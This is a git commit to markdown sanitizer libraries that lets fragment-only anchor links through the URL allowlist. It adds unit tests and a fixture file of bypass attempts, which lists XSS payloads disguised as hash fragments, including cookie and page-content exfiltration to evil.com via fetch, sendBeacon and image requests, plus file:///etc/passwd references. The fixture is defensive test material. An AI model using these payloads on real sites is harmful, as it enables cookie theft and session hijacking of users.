Allow non-malicious anchor links (#25)

haydenbleasel · web-flow · commit cf5b5bbd8ad0 · 2025-10-10T09:50:52.000-07:00
* Allow non-malicious links starting with hash

* Update tests

* Create wet-kings-carry.md

* Update wet-kings-carry.md

* Resolve feedback, allow all hash links

* Fix unit tests

* Update bypass-attempts.test.ts

* Create 211-hash-fragment-exploitation.md

* Resolve comment

* Restore deleted bypass examples
diff --git a/.changeset/wet-kings-carry.md b/.changeset/wet-kings-carry.md
@@ -0,0 +1,7 @@
+---
+"rehype-harden": patch
+"markdown-to-markdown-sanitizer": patch
+"harden-react-markdown": patch
+---
+
+Allow non-malicious links starting with hash
diff --git a/markdown-to-markdown-sanitizer/src/url-normalizer.ts b/markdown-to-markdown-sanitizer/src/url-normalizer.ts
@@ -90,6 +90,15 @@ export class UrlNormalizer {
   }
 
   sanitizeUrl(url: string, type: "href" | "src"): string {
+    // Allow hash-only (fragment-only) URLs for links - they navigate within the current page
+    if (type === "href" && url.startsWith("#")) {
+      const parsedURL = tryParseUrl(url, this.options.defaultLinkOrigin || this.options.defaultOrigin);
+      if (parsedURL && parsedURL.hash === url) {
+        return url;
+      }
+      // If it's not a valid hash-only URL, fall through to normal validation
+    }
+
     const normalizedUrl = this.normalizeUrl(
       url,
       type === "src"
diff --git a/markdown-to-markdown-sanitizer/tests/basic-sanitization.test.ts b/markdown-to-markdown-sanitizer/tests/basic-sanitization.test.ts
@@ -15,6 +15,41 @@ describe("Basic Markdown Sanitization", () => {
   };
 
   describe("Link Sanitization", () => {
+    test("allows hash-only anchor links without requiring prefixes", () => {
+      const input = "[Jump to section](#hero)";
+      const result = sanitize(input, {
+        allowedLinkPrefixes: ["https://example.com/blog"],
+      });
+      expect(result).toBe("[Jump to section](#hero)\n");
+    });
+
+    test("allows hash-only anchor links even with no allowed prefixes", () => {
+      const input = "[Jump to top](#top)";
+      const result = sanitize(input, {
+        allowedLinkPrefixes: [],
+      });
+      expect(result).toBe("[Jump to top](#top)\n");
+    });
+
+    test("safely handles hash fragments that look malicious but are just fragments", () => {
+      // When markdown is parsed, #javascript:alert('xss') is treated as a fragment identifier
+      // Hash-only URLs are allowed because they're just in-page navigation, not executable code
+      const input = "[Click me](#javascript:alert('xss'))";
+      const result = sanitize(input);
+      // Hash fragments are preserved as-is since they're safe fragment identifiers
+      // Parentheses are markdown-escaped rather than URL-encoded
+      expect(result).toBe("[Click me](#javascript:alert\\('xss'\\))\n");
+    });
+
+    test("safely handles hash fragments with data: pattern", () => {
+      // Similar to above - these are just fragment identifiers, not data: URLs
+      // Hash-only URLs starting with # are preserved as safe in-page navigation
+      const input = "[Click me](#data:text/html,<script>alert('xss')</script>)";
+      const result = sanitize(input);
+      // Parentheses are markdown-escaped rather than URL-encoded
+      expect(result).toBe("[Click me](#data:text/html,%3Cscript%3Ealert\\('xss'\\)%3C/script%3E)\n");
+    });
+
     test("allows trusted links", () => {
       const input = "[Click here](https://example.com/page)";
       const result = sanitize(input);
diff --git a/markdown-to-markdown-sanitizer/tests/bypass-attempts.test.ts b/markdown-to-markdown-sanitizer/tests/bypass-attempts.test.ts
@@ -224,6 +224,12 @@ describe("Markdown Sanitizer Bypass Attempts", () => {
       return false;
     }
 
+    // Allow hash-only fragments (in-page navigation)
+    // These are safe because they're just fragment identifiers, not executable URLs
+    if (url.startsWith("#")) {
+      return false;
+    }
+
     try {
       const parsedUrl = new URL(url);
 
diff --git a/markdown-to-markdown-sanitizer/tests/bypass-attempts/211-hash-fragment-exploitation.md b/markdown-to-markdown-sanitizer/tests/bypass-attempts/211-hash-fragment-exploitation.md
@@ -0,0 +1,114 @@
+# Hash Fragment Exploitation Attempts
+
+## Direct javascript: protocol in fragments
+[Click me](#javascript:alert('xss'))
+[Execute](#javascript:void(window.location='https://evil.com'))
+[Steal](#javascript:document.write('<img src=//evil.com?c='+document.cookie+'>'))
+
+## data: protocol patterns in fragments
+[View](#data:text/html,<script>alert('xss')</script>)
+[Load](#data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=)
+[Exec](#data:application/javascript,alert('xss'))
+
+## vbscript: and other script protocols in fragments
+[VBS](#vbscript:msgbox("xss"))
+[LiveScript](#livescript:alert('xss'))
+[JScript](#jscript:alert('xss'))
+
+## Protocol confusion with fragments
+[Confuse](#javascript:alert(1)//https://safe.com)
+[Fake](#https://safe.com#javascript:alert(1))
+[Mixed](#//safe.com#javascript:alert(1))
+
+## Fragment with embedded redirects
+[Redirect](#javascript:location='https://evil.com')
+[Navigate](#javascript:window.location.href='https://evil.com')
+[Open](#javascript:window.open('https://evil.com'))
+
+## Encoded dangerous fragments
+[URL encoded](#javascript%3Aalert%28%27xss%27%29)
+[Double encoded](#javascript%253Aalert%2528%2527xss%2527%2529)
+[HTML entities](#javascript&colon;alert&lpar;&apos;xss&apos;&rpar;)
+[Unicode](#java\u0073cript:alert('xss'))
+
+## Fragment that looks safe but contains attacks
+[Safe link?](#user-profile?id=123&callback=javascript:alert(1))
+[API call?](#/api/endpoint?code=javascript:alert(1))
+[Anchor](#section#javascript:alert(1))
+
+## Null byte and special character injection
+[Null](#safe\x00javascript:alert(1))
+[Tab](#safe\tjavascript:alert(1))
+[Newline](#safe%0Ajavascript:alert(1))
+[Carriage return](#safe%0Djavascript:alert(1))
+
+## Fragments with HTML injection attempts
+[HTML](#<img src=x onerror=alert('xss')>)
+[Script tag](#<script>alert('xss')</script>)
+[SVG](#<svg/onload=alert('xss')>)
+[Style](#<style>@import'javascript:alert(1)'</style>)
+
+## Fragments designed to exploit JS fragment navigation
+[Hash nav](#javascript:alert(1)#safe)
+[Multiple hashes](#safe##javascript:alert(1))
+[Hash encoding](#%23javascript:alert(1))
+
+## Social engineering with deceptive fragments
+[Download PDF](#javascript:alert('This looks like a safe download'))
+[View Image](#data:text/html,<h1>Click here to view</h1><script>alert(1)</script>)
+[Open Document](#javascript:void(prompt('Enter password:')))
+
+## Fragments with protocol smuggling
+[Smuggle](#javascript:/**/alert(1))
+[Comment](#javascript://comment%0Aalert(1))
+[Whitespace](#javascript:   alert(1))
+[Tab separated](#javascript:	alert(1))
+
+## Fragments attempting to break parsing
+[Nested](#javascript:eval('#javascript:alert(1)'))
+[Recursive](#javascript:location.hash='#javascript:alert(1)')
+[Self-ref](#javascript:window.location='#'+window.location.hash)
+
+## Browser-specific fragment exploits
+[Chrome](#chrome://settings)
+[Firefox](#about:config)
+[Edge](#edge://settings)
+[Safari](#safari://settings)
+
+## File protocol in fragments
+[File](#file:///etc/passwd)
+[Local](#file://c:/windows/system32/config/sam)
+[Network](#file://attacker.com/share/malware.exe)
+
+## Fragment with data exfiltration patterns
+[Exfil](#javascript:fetch('https://evil.com?d='+btoa(document.body.innerHTML)))
+[Cookie steal](#javascript:navigator.sendBeacon('https://evil.com',document.cookie))
+[Form data](#javascript:new Image().src='https://evil.com?'+document.forms[0].serialize())
+
+## Fragments attempting DOM clobbering
+[Clobber](#javascript:document.body.innerHTML='<form name=location><input name=href></form>')
+[Override](#javascript:Object.defineProperty(window,'location',{value:{href:'https://evil.com'}}))
+
+## Fragments with timing attacks
+[Timing](#javascript:setTimeout(alert,1000))
+[Interval](#javascript:setInterval(()=>fetch('https://evil.com'),1000))
+[Async](#javascript:Promise.resolve().then(()=>alert(1)))
+
+## Fragments attempting to exploit markdown renderers
+[MD exploit](#javascript:');//';alert(1);//')
+[Template](#javascript:${alert(1)})
+[Interpolation](#javascript:`${alert(1)}`')
+
+## Fragments with CRLF injection
+[CRLF](#safe%0D%0ALocation:%20javascript:alert(1))
+[Header inj](#safe%0D%0AContent-Type:%20text/html%0D%0A%0D%0A<script>alert(1)</script>)
+
+## Fragments attempting to exploit URL parsers
+[Parser conf](#javascript:alert(1)?#safe)
+[Query in frag](#safe?callback=javascript:alert(1)#)
+[Authority](#javascript://safe.com@evil.com/alert(1))
+
+## Fragments with polyglot payloads
+[Polyglot](#javascript:/*<script>*/alert(1)/*/</script>)
+[Multi-context](#javascript:'"-alert(1)-"')
+[Triple encoded](#javascript:%25%36%38%25%37%34%25%37%34%25%37%30)
diff --git a/rehype-harden/src/index.ts b/rehype-harden/src/index.ts
@@ -83,6 +83,15 @@ function transformUrl(
 ): string | null {
   if (!url) return null;
 
+  // Allow hash-only (fragment-only) URLs - they navigate within the current page
+  if (typeof url === "string" && url.startsWith("#") && !isImage) {
+    const parsedURL = parseUrl(url, defaultOrigin);
+    if (parsedURL && parsedURL.hash === url) {
+      return url;
+    }
+    // If it's not a valid hash-only URL, fall through to normal validation
+  }
+
   // Handle data: URLs for images if allowDataImages is enabled
   if (typeof url === "string" && url.startsWith("data:")) {
     // Only allow data: URLs for images when explicitly enabled
diff --git a/rehype-harden/src/tests/index.test.ts b/rehype-harden/src/tests/index.test.ts
@@ -171,6 +171,30 @@ describe("rehype-harden", () => {
   });
 
   describe("URL transformation", () => {
+    it("allows hash-only anchor links without requiring prefixes", async () => {
+      const tree = await processMarkdown("[Jump to section](#hero)", {
+        defaultOrigin: "https://example.com",
+        allowedLinkPrefixes: ["https://example.com/blog"],
+      });
+
+      const link = findElement(tree, "a");
+      expect(link).not.toBeNull();
+      expect(link!.properties.href).toBe("#hero");
+      expect(link!.properties.target).toBe("_blank");
+      expect(link!.properties.rel).toBe("noopener noreferrer");
+    });
+
+    it("allows hash-only anchor links even with no allowed prefixes", async () => {
+      const tree = await processMarkdown("[Jump to top](#top)", {
+        defaultOrigin: "https://example.com",
+        allowedLinkPrefixes: [],
+      });
+
+      const link = findElement(tree, "a");
+      expect(link).not.toBeNull();
+      expect(link!.properties.href).toBe("#top");
+    });
+
     it("preserves relative URLs when input is relative and allowed", async () => {
       const tree = await processMarkdown("[Test](/path/to/page?query=1#hash)", {
         defaultOrigin: "https://example.com",